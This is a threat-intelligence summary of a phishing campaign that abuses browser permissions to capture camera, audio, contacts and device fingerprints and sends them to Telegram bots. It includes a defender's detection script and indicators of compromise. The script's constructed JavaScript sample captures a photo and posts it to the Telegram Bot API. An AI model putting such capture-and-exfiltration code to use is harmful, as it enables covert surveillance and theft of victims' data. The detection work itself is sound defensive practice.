Key points
- Campaign hosted primarily on edgeone.app using templated phishing pages to impersonate consumer platforms (TikTok, Telegram, Instagram, Google/Chrome, Flappy Bird).
- Attackers use browser permission prompts to capture camera images, record video and audio, enumerate device metadata, and request contact access via the Contacts Picker API.
- Captured media and telemetry are exfiltrated directly to attacker-controlled Telegram bots via the Telegram Bot API (api.telegram.org), removing the need for backend servers.
- Scripts perform extensive device fingerprinting (navigator.userAgent, platform, deviceMemory, hardwareConcurrency, connection, getBattery) and retrieve public IP/geolocation via services like api.ipify.org and ipapi.co.
- Indicators in the code (structured annotations and emoji-based message formatting) suggest potential use of generative AI to assist script development and message assembly.
- Collected data can be abused for identity fraud, bypassing video-KYC, targeted social engineering, account takeover, extortion, and creation of high-fidelity assets for deepfake/impersonation attacks.
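As an added defender-side example (not Cyble's code or the campaign's script), the heuristic below triages captured page scripts for the combination of capabilities listed above; the category names, scoring thresholds and the JavaScript fragment are constructed assumptions.

```python
"""Heuristic triage of page scripts for the capability mix described above.

Added example (not Cyble's code): scores JavaScript source for the
categories of browser APIs and endpoints the campaign combines. Category
names, thresholds and the sample snippet are constructed for illustration.
"""
import re

# Each category lists patterns whose co-occurrence is the suspicious signal.
CATEGORIES = {
    "media_capture": [r"getUserMedia\(", r"\bMediaRecorder\b", r"canvas\.toBlob\("],
    "contacts": [r"navigator\.contacts\.select\("],
    "fingerprint": [r"deviceMemory", r"hardwareConcurrency",
                    r"getBattery\(", r"navigator\.connection"],
    "ip_enrichment": [r"api\.ipify\.org", r"ipapi\.co"],
    "telegram_exfil": [r"api\.telegram\.org/bot"],
}


def classify_script(source: str) -> dict:
    """Return which categories fire and a verdict on the combination."""
    hits = {name: sorted({p for p in pats if re.search(p, source)})
            for name, pats in CATEGORIES.items()}
    hits = {k: v for k, v in hits.items() if v}
    collection = {"media_capture", "contacts", "fingerprint"} & hits.keys()
    # Collection of user data plus a direct Bot API exfil path is the signal.
    if "telegram_exfil" in hits and collection:
        verdict = "high"
    elif "telegram_exfil" in hits or len(collection) >= 2:
        verdict = "medium"
    else:
        verdict = "low"
    return {"categories": hits, "verdict": verdict}


# Constructed fragment resembling the kit's structure, not real campaign code.
SAMPLE_JS = """
const stream = await navigator.mediaDevices.getUserMedia({video: true});
canvas.toBlob(b => fd.append('photo', b, 'x.jpg'), 'image/jpeg');
const info = {mem: navigator.deviceMemory, cores: navigator.hardwareConcurrency};
fetch('https://api.telegram.org/bot<TOKEN>/sendPhoto', {method: 'POST', body: fd});
"""

if __name__ == "__main__":
    print(classify_script(SAMPLE_JS))
```

Run it over scripts pulled from a suspicious landing page; a "high" verdict means the page both collects device or media data and talks to the Telegram Bot API from the browser, which is the pattern worth blocking at the proxy and hunting for in web logs.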
MITRE Techniques
- [None] No MITRE ATT&CK technique identifiers are explicitly referenced in the article: "Cyble Research & Intelligence Labs (CRIL) has identified a widespread, highly active social engineering campaign hosted primarily on edgeone.app infrastructure."
Indicators of Compromise
- [Domain] Hosting and C2 infrastructure: edgeone.app (phishing landing pages), api.telegram.org (data exfiltration via Telegram Bot API)
- [API / Service Endpoints] IP and geolocation enrichment services used: api.ipify.org (public IP lookup), ipapi.co (geolocation enrichment)
- [File types] Exfiltrated multimedia formats observed: JPEG (canvas.toBlob output for photos), WebM (recorded audio/video files)
- [Browser API / Feature] Client-side data collection vectors: Contacts Picker API (navigator.contacts.select) used to request contact names/numbers/emails; MediaRecorder / getUserMedia used for audio/video capture
Read more: https://cyble.com/blog/ai-assisted-phishing-campaign/